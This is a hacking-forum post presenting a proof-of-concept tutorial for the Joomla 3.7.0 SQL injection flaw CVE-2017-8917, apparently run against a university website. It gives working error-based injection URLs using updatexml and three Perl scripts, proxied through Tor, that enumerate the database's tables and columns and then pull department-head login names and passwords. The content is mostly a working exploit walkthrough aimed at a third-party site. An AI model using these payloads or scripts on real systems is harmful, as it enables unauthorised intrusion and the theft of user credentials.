Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Joomla 3.7.0 (CVE-2017-8917) PoC [TUTO XPATH]

  • 0 Vote(s) - 0 Average


05-20-2017, 12:06 PM #1
CrashBandicot Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:104 Threads:15 Joined:Jul 2013 Reputation: 4
Mood: Zombie
[b]Salem Aleykoum

PoC CVE-2017-8917



Getting Database :
http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(database())),null)&la ng=ar


[Image: 816125311.png]


Db used bdnote4

Count number of Tables

http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(select COUNT(*) from information_schema.tables where table_schema=database())),null)&lang=ar



[Image: 278496252.png]



Now i make boucle in perl for grabb the tables


كود PHP:
[/b]
Code:
#!/usr/bin/perl

use LWP::UserAgent;


print "\t      *****************\n\t      Getting Tables\n\t       *****************\n\n\n";
print "\n";

for ($i = 0; $i < 99; $i += 1) {
     $ua = LWP::UserAgent->new();
       $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9050');
     $ua->agent("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36");
     $res = $ua->get("http://pcnd.univ-exemple.dz/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%28null,concat%280x3a,%28select%20table_name%20from%20information_schema.tables%20where%20table_schema=database%28%29%20limit%20".$i.",1%29%29,null%29&lang=ar")->content;

        if($res =~ m/XPATH syntax error: ':(.*?)'<\/title>/g) {
       
               print $i." _  ".$1."\n";

        }
    }
__END__  
[color][size][font]
[b]
[Image: 715753633.png]




Now Get columns from tables departements

First Count number of columns

http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x646570617274656d656e7473)),null)&lang =ar


Now also make boucle getting 13 columns of table


كود PHP:
[/b][/font][/size][/color]
Code:
#!/usr/bin/perl


use LWP::UserAgent;


print "\t      *****************\n\t      Get   columns *****************\n\n\n";
print "\n";

for ($i = 0; $i < 13; $i += 1) {
     $ua = LWP::UserAgent->new();
       $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9050'); # tor socks
     $ua->agent("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36");
     $res = $ua->get("http://pcnd.univ-exemple.dz/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%28null,concat%280x3a,%28select%20column_name%20from%20information_schema.columns%20where%20table_schema=database%28%29%20and%20table_name=0x646570617274656d656e7473%20limit%20".$i.",1%29%29,null%29&lang=ar")->content;

        if($res =~ m/XPATH syntax error: ':(.*?)'<\/title>/g) {
       
               print $i." _  ".$1."\n";

        }
    }
__END__  
[color][size][font]
[b][Image: 929010315.png]



now getting data

count Data :

http://pcnd.univ-exemple.dz/index.ph...out=modal&list[fullordering]=updatexml(null,concat(0x3a,(select count(passwordchefdep) from departements)),null)&lang=ar

now get data :



كود PHP:
[/b][/font][/size][/color]
Code:
#!/usr/bin/perl


use LWP::UserAgent;


print "\t      *****************\n\t    Getting Data \n*****************\n\n\n";
print "\n";

for ($i = 0; $i < 17; $i += 1) {
     $ua = LWP::UserAgent->new();
       $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9050');
     $ua->agent("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36");
     $res = $ua->get("http://pcnd.univ-exemple.dz/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%28null,concat%280x3a,%28select%20concat%28loginchefdep,0x3a,passwordchefdep%29%20from%20departements%20limit%20".$i.",1%29%29,null%29&lang=ar")->content;

        if($res =~ m/XPATH syntax error: ':(.*?)'<\/title>/g) {
       
               print $i." _  ".$1."\n";

        }
    }
__END__  
[color][size][font]
[b][Image: 400317764.png]


DOne . [Image: smile.gif]


Other Example :

[Image: 918243exemple.png]


EnjoY  
[/b][/font][/size][/color]
 






Forum Jump:


Users browsing this thread:1 Guest(s)